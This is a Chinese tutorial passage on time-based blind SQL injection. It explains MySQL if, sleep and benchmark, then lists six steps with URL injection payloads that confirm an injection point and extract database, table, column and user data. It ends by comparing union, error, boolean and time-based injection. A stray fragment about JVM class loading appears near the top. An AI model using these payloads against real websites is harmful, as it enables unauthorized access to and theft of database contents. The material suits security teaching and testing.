本文详细介绍了时间延迟型SQL注入的原理、常用函数(如if, sleep, benchmark)及其应用,以及时间延迟注入的六个步骤,包括确认注入点、判断数据库信息、猜解表名和数据。此外,还分析了四种SQL注入方式的特点,强调在不同情况下选择合适的注入方法。"
125431214,11022284,深入理解JVM类加载机制,"['jvm', 'java']
时间延迟型注入
原理:利用if函数,执行判断; 如果正确,直接返回(时间很短,网速有一定影响) 如果不正确,执行时间延迟,常用的函数有sleep和benchmark 以上操作也可以反过来。
适用环境:界面无法用布尔真假判断,也无法报错注入的情况下。
时间延迟注入常用SQL函数介绍
if(condition,expr1,expr2)
功能:如果condition是true,则if()的返回值是expr1,否则返回值则为expr2,if()的返回值为数字值或字符串,具体情况视其所在语境而定
举例:select if(1+1=2,1,0); select if(1+1=3,1,0)
结果: 1 ; 0
sleep(arg1)
功能:arg1为中断的时间,单位为秒;
举例1:if(payload,sleep(5),1);如果测试语句正确,暂停5秒
benchmark(arg1,arg2)
功能:arg1操作次数,arg2为表达式
举例1:if(payload,benchmark(500000000),1);如果测试语句正确,暂停5秒左右,受服务器影响较大
if和sleep的结合使用
语句:select if(left(version(),1)=5,sleep(5),2)
时间延迟SQL注入步骤
第1步:确认注入点
方法:通过增加 ' 和增加--+ 注释符,语句从执行失败变为执行成功判断注入点
语句:?id=1' --+
第2步:判断数据库版本和当前数据库名长度
1)判断数据库版本
?id=1' and if(ascii(substr(version(),0,1))=5,1,sleep(5))--+
2)判断数据库名长度
?id=1' and if(length(database())>10,1,sleep(5))--+
第3步:爆数据库名
?id=1' and if(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))>10,1,sleep(5))--+
第4步:猜解数据表名
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>10,1,sleep(5))--+
第5步:猜解数据表 列名
?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>10,1,sleep(5))--+
第6步:猜解数据包内容
?id=1' and if(ascii(substr((select username from security.users limit 0,1),1,1))>20,1,sleep(5))--+
四种注入方式的分析
1.union注入:
能直接显示出想要的数据,使用简单
2.报错注入:
输入错误会直接显示数据库错误信息,我们可以通过报错注入直接获取想要的信息,与union注入相比,稍微麻烦一点,但是能直接显示信息
3.布尔注入:
会间接显示查询语句是否正确,但不会显示关键信息,重复操作多
4.时间注入:
不管SQL语句是否正确,不会返回任何信息,只能通过页面缓冲的时间来判断
综上所述
如果能够直接union是最好的,如果爆出了数据库错误可以使用报错注入,如果没有明显错误但是间接反馈了语句是否执行正确,可以布尔注入,如果什么信息都没有返回只有试试时间延迟注入。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
